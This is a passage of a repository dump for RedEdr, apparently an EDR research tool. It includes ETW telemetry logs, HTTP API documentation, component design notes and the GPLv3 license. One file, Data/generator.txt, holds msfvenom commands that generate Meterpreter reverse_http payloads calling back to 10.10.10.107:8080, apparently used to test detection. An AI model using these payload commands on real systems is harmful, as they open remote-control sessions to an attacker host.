","id":148,"opcode_id":0,"pid":1208,"provider_name":"22fb2cd6-0e7b-422b-a0c7-2fad1fd0e716","stack_trace":[18446735283802249410,18446735283797621171,18446735283801386793,18446735283801520226,18446735283800918026,18446735283801353166,18446735283801754190,18446735283799009541],"thread_id":5680,"time":133791868989816147,"trace_id":41,"type":"etw"},{"DefaultBase":"00007FFC84A00000","ImageBase":"00007FFC84A00000","ImageCheckSum":"1745311","ImageName":"\\Device\\HarddiskVolume2\\Windows\\System32\\user32.dll","ImageSize":"000000000019D000","ProcessID":"1208","TimeDateStamp":"4291603748","event":"ImageUnloadInfo 
","id":149,"opcode_id":0,"pid":1208,"provider_name":"22fb2cd6-0e7b-422b-a0c7-2fad1fd0e716","stack_trace":[18446735283802249410,18446735283797621171,18446735283801386793,18446735283801520226,18446735283800918026,18446735283801353166,18446735283801754190,18446735283799009541],"thread_id":5680,"time":133791868989816201,"trace_id":41,"type":"etw"},{"DefaultBase":"00007FFC84D50000","ImageBase":"00007FFC84D50000","ImageCheckSum":"3511252","ImageName":"\\Device\\HarddiskVolume2\\Windows\\System32\\combase.dll","ImageSize":"0000000000353000","ProcessID":"1208","TimeDateStamp":"3888075817","event":"ImageUnloadInfo ","id":150,"opcode_id":0,"pid":1208,"provider_name":"22fb2cd6-0e7b-422b-a0c7-2fad1fd0e716","stack_trace":[18446735283802249410,18446735283797621171,18446735283801386793,18446735283801520226,18446735283800918026,18446735283801353166,18446735283801754190,18446735283799009541],"thread_id":5680,"time":133791868989816259,"trace_id":41,"type":"etw"},{"DefaultBase":"00007FFC850F0000","ImageBase":"00007FFC850F0000","ImageCheckSum":"2047181","ImageName":"\\Device\\HarddiskVolume2\\Windows\\System32\\ntdll.dll","ImageSize":"00000000001F8000","ProcessID":"1208","TimeDateStamp":"1754238027","event":"ImageUnloadInfo 
","id":151,"opcode_id":0,"pid":1208,"provider_name":"22fb2cd6-0e7b-422b-a0c7-2fad1fd0e716","stack_trace":[18446735283802249410,18446735283797621171,18446735283801386793,18446735283801520226,18446735283800918026,18446735283801353166,18446735283801754190,18446735283799009541],"thread_id":5680,"time":133791868989816312,"trace_id":41,"type":"etw"},{"CPUCycleCount":"184728780","CommitCharge":"24412160","CommitPeak":"24461312","CreateTime":"133791868973820309","ExitCode":"3221225477","ExitTime":"133791868989814630","HandleCount":"100","HardFaultCount":"0","ImageName":"RedEdrTester.e","ProcessID":"1208","ProcessSequenceNumber":"2314","ReadOperationCount":"9","ReadTransferKiloBytes":"22","TokenElevationType":"3","WriteOperationCount":"45","WriteTransferKiloBytes":"20","event":"ProcessStopStop ","id":152,"opcode_id":2,"pid":1208,"provider_name":"22fb2cd6-0e7b-422b-a0c7-2fad1fd0e716","stack_trace":[18446735283797242684,18446735283801521634,18446735283801520587,18446735283801519924,18446735283800918026,18446735283801353166,18446735283801754190,18446735283799009541],"thread_id":5680,"time":133791868989816369,"trace_id":41,"type":"etw"},{"BaseAddress":"0x0000025BA365CB30","CallingProcessCreateTime":"2024/12/20 17.48.17","CallingProcessId":"1208","CallingProcessProtection":"(Unknown type)","CallingProcessSectionSignatureLevel":"(Unknown type)","CallingProcessSignatureLevel":"(Unknown type)","CallingProcessStartKey":"25332747903961354","CallingThreadCreateTime":"2024/12/20 17.48.17","CallingThreadId":"6916","LastProtectionMask":"4","OriginalProcessCreateTime":"2024/12/20 17.48.17","OriginalProcessId":"1208","OriginalProcessProtection":"(Unknown type)","OriginalProcessSectionSignatureLevel":"(Unknown type)","OriginalProcessSignatureLevel":"(Unknown type)","OriginalProcessStartKey":"25332747903961354","ProtectionMask":"64","RegionSize":"0x0000025BA365C950","TargetProcessCreateTime":"2024/12/20 17.48.17","TargetProcessId":"1208","TargetProcessProtection":"(Unknown 
type)","TargetProcessSectionSignatureLevel":"(Unknown type)","TargetProcessSignatureLevel":"(Unknown type)","TargetProcessStartKey":"25332747903961354","event":"PROTECTVM_LOCAL","id":153,"pid":1208,"provider_name":"Microsoft-Windows-Threat-Intelligence","thread_id":6916,"time":133791868979063418,"trace_id":41,"type":"etw"}]
================================================
FILE: Data/generator.txt
================================================
# non-staged
msfvenom -a x64 -p windows/x64/meterpreter_reverse_http AUTOLOADSTDAPI=FALSE LPORT=8080 LHOST=10.10.10.107 -f raw -o meterpreter-revhttp-nonstaged-noautoload.bin
msfvenom -a x64 -p windows/x64/meterpreter_reverse_http LPORT=8080 LHOST=10.10.10.107 -f raw -o meterpreter-revhttp-nonstaged-autoload.bin
# staged
msfvenom -a x64 -p windows/x64/meterpreter/reverse_http LPORT=8080 LHOST=10.10.10.107 -f raw -o meterpreter-revhttp-staged.bin
msfvenom -a x64 -p windows/x64/meterpreter/reverse_http AUTOLOADSTDAPI=FALSE LPORT=8080 LHOST=10.10.10.107 -f raw -o meterpreter-revhttp-staged-noautoload.bin
================================================
FILE: Doc/api.md
================================================
# RedEdr HTTP API Documentation
This document is AI generated but reviewed.
RedEdr provides a REST API through an embedded HTTP server for interacting with the EDR system. The web server listens on a configurable port and provides both a web UI and programmatic API access.
## Data definition
**Events** can be viewed as a dict (key-value pairs). An event is mostly flat, but can contain arrays or nested dicts:
```
```
## HTTP UI
Provides an easy-to-use web interface for RedEdr on localhost.
### GET /
Serves the main web UI.
- **Response**: HTML content of the main interface
### GET /static/design.css
Serves the CSS stylesheet.
- **Response**: CSS content for styling
### GET /static/shared.js
Serves the JavaScript file.
- **Response**: JavaScript content for the web interface
### GET /api/stats
Returns system statistics and counters.
- **Response**: JSON object with event counts and statistics
- **Content-Type**: `application/json; charset=UTF-8`
- **Response Fields**:
- `events_count` - Total number of events
- `num_kernel` - Number of kernel events
- `num_etw` - Number of ETW events
- `num_etwti` - Number of ETW TI events
- `num_dll` - Number of DLL events
- `num_process_cache` - Number of cached processes
### GET /api/save
Saves current events to a file.
- **Response**: Triggers save operation
- **Side Effect**: Events are saved to disk
## Enable Tracing and Payload Execution
Used to define which processes RedEdr will observe, and optionally
to also execute the malware. Primarily used by Detonator.
### GET /api/trace/info
Gets the current trace target executable names.
- **Response**: JSON object with current trace targets
- **Content-Type**: `application/json`
- **Response Format**: `{"trace": ["target1", "target2"]}`
### POST /api/trace/start
Sets the process name(s) to be observed.
Request: `application/json`
- `{"trace": ["executable1", "executable2"]}` - Multiple targets
Response: `application/json`
- **Response**: `{"result": "ok"}` on success
- **Error Responses**:
- `400` - Invalid JSON or missing arguments
### POST /api/trace/reset
Resets all captured events and system state.
- **Response**: Clears all current data
- **Side Effect**: All events and state are reset
## Retrieve Log Results
Retrieves the recorded logs of all involved components.
### GET /api/logs/rededr
Retrieves all captured events from the current session.
Events are things recorded by RedEdr, including ETW events, or DLL hooking events.
Response: `application/json`
- Array of event objects
Response Example:
```json
[
{
"date":"2025-07-20-10-36-24",
"do_etw":false,
"do_etwti":false,
"do_hook":false,
"do_hook_callstack": true,
"func":"init",
"target":"otepad",
"trace_id":41,
"type":"meta",
"version":"0.4"
}
]
```
### GET /api/logs/agent
Get the logging output of the agent itself (RedEdr and also RedEdrPplService).
Response: `application/json`
- Array of log strings
Response example:
```json
[
"RedEdr 0.4",
"Config: tracing otepad",
"Permissions: Enabled PRIVILEGED & DEBUG"
]
```
## Lock Management
If RedEdr is used by multiple users, each can lock RedEdr for the
duration of their use. If this is not done, concurrent use will produce inconsistent results.
### POST /api/lock/acquire
Acquires a resource lock to prevent concurrent access.
- **Response**: `200 OK` if lock acquired successfully
- **Error Responses**:
- `409 Conflict` - Resource is already in use
- `{"status": "error", "message": "Resource is already in use"}`
### POST /api/lock/release
Releases the resource lock.
- **Response**: `200 OK` - Lock released
### GET /api/lock/status
Gets the current lock status.
- **Response**: JSON object with lock state
- **Response Format**: `{"in_use": true/false}`
================================================
FILE: Doc/notes.md
================================================
# Notes
## Solutions
RedEdr:
* ETW reader
* MPLOG reader
* pipe-server for RedEdrDll (`pipe\\RedEdrDllCom`)
* pipe-server for RedEdrDriver (`pipe\\RedEdrKrnCom`)
* pipe-client for RedEdrPplService (`pipe\\RedEdrPplService`)
RedEdrDriver:
* Kernel driver to capture kernel callbacks
* Will do KAPC injection
* connects to RedEdr `pipe\\RedEdrKrnCom` to transmit captured data
* Receives IOCTLs from RedEdr carrying its instructions
RedEdrPplService:
* to be loaded as a PPL Windows service
* To capture ETW-TI
* connects to RedEdr `pipe\\RedEdrDllCom` to transmit captured data
* provides `pipe\\RedEdrPplService`, which RedEdr connects to in order to send instructions
RedEdrDll:
* amsi.dll style, to be injected into target processes
* connects to RedEdr `pipe\\RedEdrDllCom` to transmit captured data
* will receive config from RedEdr first
RedEdrTester:
* internal testing tool
## Notifications
Notify components about new config:
* RedEdr: Automatic
* RedEdrDriver: send IOCTL
* RedEdrPplService: pipe
* RedEdrDll: pipe (automatic on new process creation)
================================================
FILE: LICENSE.txt
================================================
GNU GENERAL PUBLIC LICENSE
Version 3, 29 June 2007
Copyright (C) 2007 Free Software Foundation, Inc. <https://fsf.org/>
Everyone is permitted to copy and distribute verbatim copies
of this license document, but changing it is not allowed.
Preamble
The GNU General Public License is a free, copyleft license for
software and other kinds of works.
The licenses for most software and other practical works are designed
to take away your freedom to share and change the works. By contrast,
the GNU General Public License is intended to guarantee your freedom to
share and change all versions of a program--to make sure it remains free
software for all its users. We, the Free Software Foundation, use the
GNU General Public License for most of our software; it applies also to
any other work released this way by its authors. You can apply it to
your programs, too.
When we speak of free software, we are referring to freedom, not
price. Our General Public Licenses are designed to make sure that you
have the freedom to distribute copies of free software (and charge for
them if you wish), that you receive source code or can get it if you
want it, that you can change the software or use pieces of it in new
free programs, and that you know you can do these things.
To protect your rights, we need to prevent others from denying you
these rights or asking you to surrender the rights. Therefore, you have
certain responsibilities if you distribute copies of the software, or if
you modify it: responsibilities to respect the freedom of others.
For example, if you distribute copies of such a program, whether
gratis or for a fee, you must pass on to the recipients the same
freedoms that you received. You must make sure that they, too, receive
or can get the source code. And you must show them these terms so they
know their rights.
Developers that use the GNU GPL protect your rights with two steps:
(1) assert copyright on the software, and (2) offer you this License
giving you legal permission to copy, distribute and/or modify it.
For the developers' and authors' protection, the GPL clearly explains
that there is no warranty for this free software. For both users' and
authors' sake, the GPL requires that modified versions be marked as
changed, so that their problems will not be attributed erroneously to
authors of previous versions.
Some devices are designed to deny users access to install or run
modified versions of the software inside them, although the manufacturer
can do so. This is fundamentally incompatible with the aim of
protecting users' freedom to change the software. The systematic
pattern of such abuse occurs in the area of products for individuals to
use, which is precisely where it is most unacceptable. Therefore, we
have designed this version of the GPL to prohibit the practice for those
products. If such problems arise substantially in other domains, we
stand ready to extend this provision to those domains in future versions
of the GPL, as needed to protect the freedom of users.
Finally, every program is threatened constantly by software patents.
States should not allow patents to restrict development and use of
software on general-purpose computers, but in those that do, we wish to
avoid the special danger that patents applied to a free program could
make it effectively proprietary. To prevent this, the GPL assures that
patents cannot be used to render the program non-free.
The precise terms and conditions for copying, distribution and
modification follow.
TERMS AND CONDITIONS
0. Definitions.
"This License" refers to version 3 of the GNU General Public License.
"Copyright" also means copyright-like laws that apply to other kinds of
works, such as semiconductor masks.
"The Program" refers to any copyrightable work licensed under this
License. Each licensee is addressed as "you". "Licensees" and
"recipients" may be individuals or organizations.
To "modify" a work means to copy from or adapt all or part of the work
in a fashion requiring copyright permission, other than the making of an
exact copy. The resulting work is called a "modified version" of the
earlier work or a work "based on" the earlier work.
A "covered work" means either the unmodified Program or a work based
on the Program.
To "propagate" a work means to do anything with it that, without
permission, would make you directly or secondarily liable for
infringement under applicable copyright law, except executing it on a
computer or modifying a private copy. Propagation includes copying,
distribution (with or without modification), making available to the
public, and in some countries other activities as well.
To "convey" a work means any kind of propagation that enables other
parties to make or receive copies. Mere interaction with a user through
a computer network, with no transfer of a copy, is not conveying.
An interactive user interface displays "Appropriate Legal Notices"
to the extent that it includes a convenient and prominently visible
feature that (1) displays an appropriate copyright notice, and (2)
tells the user that there is no warranty for the work (except to the
extent that warranties are provided), that licensees may convey the
work under this License, and how to view a copy of this License. If
the interface presents a list of user commands or options, such as a
menu, a prominent item in the list meets this criterion.
1. Source Code.
The "source code" for a work means the preferred form of the work
for making modifications to it. "Object code" means any non-source
form of a work.
A "Standard Interface" means an interface that either is an official
standard defined by a recognized standards body, or, in the case of
interfaces specified for a particular programming language, one that
is widely used among developers working in that language.
The "System Libraries" of an executable work include anything, other
than the work as a whole, that (a) is included in the normal form of
packaging a Major Component, but which is not part of that Major
Component, and (b) serves only to enable use of the work with that
Major Component, or to implement a Standard Interface for which an
implementation is available to the public in source code form. A
"Major Component", in this context, means a major essential component
(kernel, window system, and so on) of the specific operating system
(if any) on which the executable work runs, or a compiler used to
produce the work, or an object code interpreter used to run it.
The "Corresponding Source" for a work in object code form means all
the source code needed to generate, install, and (for an executable
work) run the object code and to modify the work, including scripts to
control those activities. However, it does not include the work's
System Libraries, or general-purpose tools or generally available free
programs which are used unmodified in performing those activities but
which are not part of the work. For example, Corresponding Source
includes interface definition files associated with source files for
the work, and the source code for shared libraries and dynamically
linked subprograms that the work is specifically designed to require,
such as by intimate data communication or control flow between those
subprograms and other parts of the work.
The Corresponding Source need not include anything that users
can regenerate automatically from other parts of the Corresponding
Source.
The Corresponding Source for a work in source code form is that
same work.
2. Basic Permissions.
All rights granted under this License are granted for the term of
copyright on the Program, and are irrevocable provided the stated
conditions are met. This License explicitly affirms your unlimited
permission to run the unmodified Program. The output from running a
covered work is covered by this License only if the output, given its
content, constitutes a covered work. This License acknowledges your
rights of fair use or other equivalent, as provided by copyright law.
You may make, run and propagate covered works that you do not
convey, without conditions so long as your license otherwise remains
in force. You may convey covered works to others for the sole purpose
of having them make modifications exclusively for you, or provide you
with facilities for running those works, provided that you comply with
the terms of this License in conveying all material for which you do
not control copyright. Those thus making or running the covered works
for you must do so exclusively on your behalf, under your direction
and control, on terms that prohibit them from making any copies of
your copyrighted material outside their relationship with you.
Conveying under any other circumstances is permitted solely under
the conditions stated below. Sublicensing is not allowed; section 10
makes it unnecessary.
3. Protecting Users' Legal Rights From Anti-Circumvention Law.
No covered work shall be deemed part of an effective technological
measure under any applicable law fulfilling obligations under article
11 of the WIPO copyright treaty adopted on 20 December 1996, or
similar laws prohibiting or restricting circumvention of such
measures.
When you convey a covered work, you waive any legal power to forbid
circumvention of technological measures to the extent such circumvention
is effected by exercising rights under this License with respect to
the covered work, and you disclaim any intention to limit operation or
modification of the work as a means of enforcing, against the work's
users, your or third parties' legal rights to forbid circumvention of
technological measures.
4. Conveying Verbatim Copies.
You may convey verbatim copies of the Program's source code as you
receive it, in any medium, provided that you conspicuously and
appropriately publish on each copy an appropriate copyright notice;
keep intact all notices stating that this License and any
non-permissive terms added in accord with section 7 apply to the code;
keep intact all notices of the absence of any warranty; and give all
recipients a copy of this License along with the Program.
You may charge any price or no price for each copy that you convey,
and you may offer support or warranty protection for a fee.
5. Conveying Modified Source Versions.
You may convey a work based on the Program, or the modifications to
produce it from the Program, in the form of source code under the
terms of section 4, provided that you also meet all of these conditions:
a) The work must carry prominent notices stating that you modified
it, and giving a relevant date.
b) The work must carry prominent notices stating that it is
released under this License and any conditions added under section
7. This requirement modifies the requirement in section 4 to
"keep intact all notices".
c) You must license the entire work, as a whole, under this
License to anyone who comes into possession of a copy. This
License will therefore apply, along with any applicable section 7
additional terms, to the whole of the work, and all its parts,
regardless of how they are packaged. This License gives no
permission to license the work in any other way, but it does not
invalidate such permission if you have separately received it.
d) If the work has interactive user interfaces, each must display
Appropriate Legal Notices; however, if the Program has interactive
interfaces that do not display Appropriate Legal Notices, your
work need not make them do so.
A compilation of a covered work with other separate and independent
works, which are not by their nature extensions of the covered work,
and which are not combined with it such as to form a larger program,
in or on a volume of a storage or distribution medium, is called an
"aggregate" if the compilation and its resulting copyright are not
used to limit the access or legal rights of the compilation's users
beyond what the individual works permit. Inclusion of a covered work
in an aggregate does not cause this License to apply to the other
parts of the aggregate.
6. Conveying Non-Source Forms.
You may convey a covered work in object code form under the terms
of sections 4 and 5, provided that you also convey the
machine-readable Corresponding Source under the terms of this License,
in one of these ways:
a) Convey the object code in, or embodied in, a physical product
(including a physical distribution medium), accompanied by the
Corresponding Source fixed on a durable physical medium
customarily used for software interchange.
b) Convey the object code in, or embodied in, a physical product
(including a physical distribution medium), accompanied by a
written offer, valid for at least three years and valid for as
long as you offer spare parts or customer support for that product
model, to give anyone who possesses the object code either (1) a
copy of the Corresponding Source for all the software in the
product that is covered by this License, on a durable physical
medium customarily used for software interchange, for a price no
more than your reasonable cost of physically performing this
conveying of source, or (2) access to copy the
Corresponding Source from a network server at no charge.
c) Convey individual copies of the object code with a copy of the
written offer to provide the Corresponding Source. This
alternative is allowed only occasionally and noncommercially, and
only if you received the object code with such an offer, in accord
with subsection 6b.
d) Convey the object code by offering access from a designated
place (gratis or for a charge), and offer equivalent access to the
Corresponding Source in the same way through the same place at no
further charge. You need not require recipients to copy the
Corresponding Source along with the object code. If the place to
copy the object code is a network server, the Corresponding Source
may be on a different server (operated by you or a third party)
that supports equivalent copying facilities, provided you maintain
clear directions next to the object code saying where to find the
Corresponding Source. Regardless of what server hosts the
Corresponding Source, you remain obligated to ensure that it is
available for as long as needed to satisfy these requirements.
e) Convey the object code using peer-to-peer transmission, provided
you inform other peers where the object code and Corresponding
Source of the work are being offered to the general public at no
charge under subsection 6d.
A separable portion of the object code, whose source code is excluded
from the Corresponding Source as a System Library, need not be
included in conveying the object code work.
A "User Product" is either (1) a "consumer product", which means any
tangible personal property which is normally used for personal, family,
or household purposes, or (2) anything designed or sold for incorporation
into a dwelling. In determining whether a product is a consumer product,
doubtful cases shall be resolved in favor of coverage. For a particular
product received by a particular user, "normally used" refers to a
typical or common use of that class of product, regardless of the status
of the particular user or of the way in which the particular user
actually uses, or expects or is expected to use, the product. A product
is a consumer product regardless of whether the product has substantial
commercial, industrial or non-consumer uses, unless such uses represent
the only significant mode of use of the product.
"Installation Information" for a User Product means any methods,
procedures, authorization keys, or other information required to install
and execute modified versions of a covered work in that User Product from
a modified version of its Corresponding Source. The information must
suffice to ensure that the continued functioning of the modified object
code is in no case prevented or interfered with solely because
modification has been made.
If you convey an object code work under this section in, or with, or
specifically for use in, a User Product, and the conveying occurs as
part of a transaction in which the right of possession and use of the
User Product is transferred to the recipient in perpetuity or for a
fixed term (regardless of how the transaction is characterized), the
Corresponding Source conveyed under this section must be accompanied
by the Installation Information. But this requirement does not apply
if neither you nor any third party retains the ability to install
modified object code on the User Product (for example, the work has
been installed in ROM).
The requirement to provide Installation Information does not include a
requirement to continue to provide support service, warranty, or updates
for a work that has been modified or installed by the recipient, or for
the User Product in which it has been modified or installed. Access to a
network may be denied when the modification itself materially and
adversely affects the operation of the network or violates the rules and
protocols for communication across the network.
Corresponding Source conveyed, and Installation Information provided,
in accord with this section must be in a format that is publicly
documented (and with an implementation available to the public in
source code form), and must require no special password or key for
unpacking, reading or copying.
7. Additional Terms.
"Additional permissions" are terms that supplement the terms of this
License by making exceptions from one or more of its conditions.
Additional permissions that are applicable to the entire Program shall
be treated as though they were included in this License, to the extent
that they are valid under applicable law. If additional permissions
apply only to part of the Program, that part may be used separately
under those permissions, but the entire Program remains governed by
this License without regard to the additional permissions.
When you convey a copy of a covered work, you may at your option
remove any additional permissions from that copy, or from any part of
it. (Additional permissions may be written to require their own
removal in certain cases when you modify the work.) You may place
additional permissions on material, added by you to a covered work,
for which you have or can give appropriate copyright permission.
Notwithstanding any other provision of this License, for material you
add to a covered work, you may (if authorized by the copyright holders of
that material) supplement the terms of this License with terms:
a) Disclaiming warranty or limiting liability differently from the
terms of sections 15 and 16 of this License; or
b) Requiring preservation of specified reasonable legal notices or
author attributions in that material or in the Appropriate Legal
Notices displayed by works containing it; or
c) Prohibiting misrepresentation of the origin of that material, or
requiring that modified versions of such material be marked in
reasonable ways as different from the original version; or
d) Limiting the use for publicity purposes of names of licensors or
authors of the material; or
e) Declining to grant rights under trademark law for use of some
trade names, trademarks, or service marks; or
f) Requiring indemnification of licensors and authors of that
material by anyone who conveys the material (or modified versions of
it) with contractual assumptions of liability to the recipient, for
any liability that these contractual assumptions directly impose on
those licensors and authors.
All other non-permissive additional terms are considered "further
restrictions" within the meaning of section 10. If the Program as you
received it, or any part of it, contains a notice stating that it is
governed by this License along with a term that is a further
restriction, you may remove that term. If a license document contains
a further restriction but permits relicensing or conveying under this
License, you may add to a covered work material governed by the terms
of that license document, provided that the further restriction does
not survive such relicensing or conveying.
If you add terms to a covered work in accord with this section, you
must place, in the relevant source files, a statement of the
additional terms that apply to those files, or a notice indicating
where to find the applicable terms.
Additional terms, permissive or non-permissive, may be stated in the
form of a separately written license, or stated as exceptions;
the above requirements apply either way.
8. Termination.
You may not propagate or modify a covered work except as expressly
provided under this License. Any attempt otherwise to propagate or
modify it is void, and will automatically terminate your rights under
this License (including any patent licenses granted under the third
paragraph of section 11).
However, if you cease all violation of this License, then your
license from a particular copyright holder is reinstated (a)
provisionally, unless and until the copyright holder explicitly and
finally terminates your license, and (b) permanently, if the copyright
holder fails to notify you of the violation by some reasonable means
prior to 60 days after the cessation.
Moreover, your license from a particular copyright holder is
reinstated permanently if the copyright holder notifies you of the
violation by some reasonable means, this is the first time you have
received notice of violation of this License (for any work) from that
copyright holder, and you cure the violation prior to 30 days after
your receipt of the notice.
Termination of your rights under this section does not terminate the
licenses of parties who have received copies or rights from you under
this License. If your rights have been terminated and not permanently
reinstated, you do not qualify to receive new licenses for the same
material under section 10.
9. Acceptance Not Required for Having Copies.
You are not required to accept this License in order to receive or
run a copy of the Program. Ancillary propagation of a covered work
occurring solely as a consequence of using peer-to-peer transmission
to receive a copy likewise does not require acceptance. However,
nothing other than this License grants you permission to propagate or
modify any covered work. These actions infringe copyright if you do
not accept this License. Therefore, by modifying or propagating a
covered work, you indicate your acceptance of this License to do so.
10. Automatic Licensing of Downstream Recipients.
Each time you convey a covered work, the recipient automatically
receives a license from the original licensors, to run, modify and
propagate that work, subject to this License. You are not responsible
for enforcing compliance by third parties with this License.
An "entity transaction" is a transaction transferring control of an
organization, or substantially all assets of one, or subdividing an
organization, or merging organizations. If propagation of a covered
work results from an entity transaction, each party to that
transaction who receives a copy of the work also receives whatever
licenses to the work the party's predecessor in interest had or could
give under the previous paragraph, plus a right to possession of the
Corresponding Source of the work from the predecessor in interest, if
the predecessor has it or can get it with reasonable efforts.
You may not impose any further restrictions on the exercise of the
rights granted or affirmed under this License. For example, you may
not impose a license fee, royalty, or other charge for exercise of
rights granted under this License, and you may not initiate litigation
(including a cross-claim or counterclaim in a lawsuit) alleging that
any patent claim is infringed by making, using, selling, offering for
sale, or importing the Program or any portion of it.
11. Patents.
A "contributor" is a copyright holder who authorizes use under this
License of the Program or a work on which the Program is based. The
work thus licensed is called the contributor's "contributor version".
A contributor's "essential patent claims" are all patent claims
owned or controlled by the contributor, whether already acquired or
hereafter acquired, that would be infringed by some manner, permitted
by this License, of making, using, or selling its contributor version,
but do not include claims that would be infringed only as a
consequence of further modification of the contributor version. For
purposes of this definition, "control" includes the right to grant
patent sublicenses in a manner consistent with the requirements of
this License.
Each contributor grants you a non-exclusive, worldwide, royalty-free
patent license under the contributor's essential patent claims, to
make, use, sell, offer for sale, import and otherwise run, modify and
propagate the contents of its contributor version.
In the following three paragraphs, a "patent license" is any express
agreement or commitment, however denominated, not to enforce a patent
(such as an express permission to practice a patent or covenant not to
sue for patent infringement). To "grant" such a patent license to a
party means to make such an agreement or commitment not to enforce a
patent against the party.
If you convey a covered work, knowingly relying on a patent license,
and the Corresponding Source of the work is not available for anyone
to copy, free of charge and under the terms of this License, through a
publicly available network server or other readily accessible means,
then you must either (1) cause the Corresponding Source to be so
available, or (2) arrange to deprive yourself of the benefit of the
patent license for this particular work, or (3) arrange, in a manner
consistent with the requirements of this License, to extend the patent
license to downstream recipients. "Knowingly relying" means you have
actual knowledge that, but for the patent license, your conveying the
covered work in a country, or your recipient's use of the covered work
in a country, would infringe one or more identifiable patents in that
country that you have reason to believe are valid.
If, pursuant to or in connection with a single transaction or
arrangement, you convey, or propagate by procuring conveyance of, a
covered work, and grant a patent license to some of the parties
receiving the covered work authorizing them to use, propagate, modify
or convey a specific copy of the covered work, then the patent license
you grant is automatically extended to all recipients of the covered
work and works based on it.
A patent license is "discriminatory" if it does not include within
the scope of its coverage, prohibits the exercise of, or is
conditioned on the non-exercise of one or more of the rights that are
specifically granted under this License. You may not convey a covered
work if you are a party to an arrangement with a third party that is
in the business of distributing software, under which you make payment
to the third party based on the extent of your activity of conveying
the work, and under which the third party grants, to any of the
parties who would receive the covered work from you, a discriminatory
patent license (a) in connection with copies of the covered work
conveyed by you (or copies made from those copies), or (b) primarily
for and in connection with specific products or compilations that
contain the covered work, unless you entered into that arrangement,
or that patent license was granted, prior to 28 March 2007.
Nothing in this License shall be construed as excluding or limiting
any implied license or other defenses to infringement that may
otherwise be available to you under applicable patent law.
12. No Surrender of Others' Freedom.
If conditions are imposed on you (whether by court order, agreement or
otherwise) that contradict the conditions of this License, they do not
excuse you from the conditions of this License. If you cannot convey a
covered work so as to satisfy simultaneously your obligations under this
License and any other pertinent obligations, then as a consequence you may
not convey it at all. For example, if you agree to terms that obligate you
to collect a royalty for further conveying from those to whom you convey
the Program, the only way you could satisfy both those terms and this
License would be to refrain entirely from conveying the Program.
13. Use with the GNU Affero General Public License.
Notwithstanding any other provision of this License, you have
permission to link or combine any covered work with a work licensed
under version 3 of the GNU Affero General Public License into a single
combined work, and to convey the resulting work. The terms of this
License will continue to apply to the part which is the covered work,
but the special requirements of the GNU Affero General Public License,
section 13, concerning interaction through a network will apply to the
combination as such.
14. Revised Versions of this License.
The Free Software Foundation may publish revised and/or new versions of
the GNU General Public License from time to time. Such new versions will
be similar in spirit to the present version, but may differ in detail to
address new problems or concerns.
Each version is given a distinguishing version number. If the
Program specifies that a certain numbered version of the GNU General
Public License "or any later version" applies to it, you have the
option of following the terms and conditions either of that numbered
version or of any later version published by the Free Software
Foundation. If the Program does not specify a version number of the
GNU General Public License, you may choose any version ever published
by the Free Software Foundation.
If the Program specifies that a proxy can decide which future
versions of the GNU General Public License can be used, that proxy's
public statement of acceptance of a version permanently authorizes you
to choose that version for the Program.
Later license versions may give you additional or different
permissions. However, no additional obligations are imposed on any
author or copyright holder as a result of your choosing to follow a
later version.
15. Disclaimer of Warranty.
THERE IS NO WARRANTY FOR THE PROGRAM, TO THE EXTENT PERMITTED BY
APPLICABLE LAW. EXCEPT WHEN OTHERWISE STATED IN WRITING THE COPYRIGHT
HOLDERS AND/OR OTHER PARTIES PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY
OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING, BUT NOT LIMITED TO,
THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
PURPOSE. THE ENTIRE RISK AS TO THE QUALITY AND PERFORMANCE OF THE PROGRAM
IS WITH YOU. SHOULD THE PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF
ALL NECESSARY SERVICING, REPAIR OR CORRECTION.
16. Limitation of Liability.
IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING
WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MODIFIES AND/OR CONVEYS
THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, INCLUDING ANY
GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING OUT OF THE
USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED TO LOSS OF
DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY YOU OR THIRD
PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER PROGRAMS),
EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE POSSIBILITY OF
SUCH DAMAGES.
17. Interpretation of Sections 15 and 16.
If the disclaimer of warranty and limitation of liability provided
above cannot be given local legal effect according to their terms,
reviewing courts shall apply local law that most closely approximates
an absolute waiver of all civil liability in connection with the
Program, unless a warranty or assumption of liability accompanies a
copy of the Program in return for a fee.
END OF TERMS AND CONDITIONS
How to Apply These Terms to Your New Programs
If you develop a new program, and you want it to be of the greatest
possible use to the public, the best way to achieve this is to make it
free software which everyone can redistribute and change under these terms.
To do so, attach the following notices to the program. It is safest
to attach them to the start of each source file to most effectively
state the exclusion of warranty; and each file should have at least
the "copyright" line and a pointer to where the full notice is found.
<one line to give the program's name and a brief idea of what it does.>
Copyright (C) <year> <name of author>
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <https://www.gnu.org/licenses/>.
Also add information on how to contact you by electronic and paper mail.
If the program does terminal interaction, make it output a short
notice like this when it starts in an interactive mode:
<program> Copyright (C) <year> <name of author>
This program comes with ABSOLUTELY NO WARRANTY; for details type `show w'.
This is free software, and you are welcome to redistribute it
under certain conditions; type `show c' for details.
The hypothetical commands `show w' and `show c' should show the appropriate
parts of the General Public License. Of course, your program's commands
might be different; for a GUI interface, you would use an "about box".
You should also get your employer (if you work as a programmer) or school,
if any, to sign a "copyright disclaimer" for the program, if necessary.
For more information on this, and how to apply and follow the GNU GPL, see
<https://www.gnu.org/licenses/>.
The GNU General Public License does not permit incorporating your program
into proprietary programs. If your program is a subroutine library, you
may consider it more useful to permit linking proprietary applications with
the library. If this is what you want to do, use the GNU Lesser General
Public License instead of this License. But first, please read
